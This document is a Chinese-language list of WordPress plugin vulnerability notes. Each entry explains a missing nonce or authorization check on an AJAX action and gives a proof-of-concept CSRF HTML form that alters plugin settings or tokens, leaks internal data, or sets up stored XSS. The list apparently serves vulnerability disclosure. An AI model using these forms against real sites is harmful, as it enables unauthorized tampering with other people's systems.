access-code-feeder < 1.0.3 subscriber权限下CSRF导致的插件更新

POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=base_url_action" method="POST" enctype="multipart/form-data"> < input type="hidden" name="new_url" value="http://www.google.com"> < input type="submit" name="Submit"> < /form> < /body> < /html> 漏洞详情:https://patchstack.com/database/vulnerability/access-code-feeder/wordpress-access-code-feeder-plugin-1-0-3-cross-site-request-forgery-csrf-vulnerability

about-rentals < = 1.5 任意用户未经授权的函数调用导致配置更新

由于没有对AJAX异常函数调用进行NONCE的验证和角色权限的判断,从而导致了任意用户未经授权的函数调用导致配置更新 POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=abr_update_search_settings" method="POST" enctype="multipart/form-data"> < input type="hidden" name="value" value="200"> < input type="submit" name="Submit"> < /form> < /body> < /html> 从而导致修改了插件的配置

accommodation-system < = 1.0.1 subscriber权限下CSRF漏洞导致敏感信息泄露

由于没有对AJAX进行NONCE和权限的判断,从而导致CSRF漏洞 POC如下: < html> < body> < form action="http://localhost/new/wp-admin/admin-ajax.php?action=has_task" method="POST" enctype="multipart/form-data"> < input type="hidden" name="task_name" value="room-floor"> < input type="submit" name="Submit"> < /form> < /body> < /html> 导致了一些内部信息的泄露

WordPress Notification Bar for WordPress plugin <= 1.1.8 - 未经认证用户的存储型XSS漏洞攻击

由于缺少CSRF的检测,导致任何用户可以修改插件配置,把危险代码存储进数据库,从而导致进一步的XSS攻击 POC如下: < html> < body> < form action="http://exsample.com/wp-admin/admin-ajax.php?action=ajax_subscribe" method="POST" enctype="multipart/form-data"> < input type="hidden" name="email" value="e[email protected]“> < input type="submit" name="Submit"> < /form> < /body> < /html> 一旦管理员访问了后台该插件配置,立刻触发了XSS攻击代码

WordPress THE Leads Management System: 59sec LITE plugin <= 3.4.1 未经认证用户随意更改插件配置

由于缺少对AJAX的授权认证,导致未经认证用户随意更改插件配置,比如保存插件的tokens设置, 以下为POC < html> < body> < form action=”http://exsample.com/wp-admin/admin-ajax.php?action=59sec_save_tokens” method=”POST” enctype=”multipart/form-data”> < input type=”hidden” name=”device_token” value=”anyvalue”> < input type=”submit” name=”Submit”> < /form> < /body> < /html>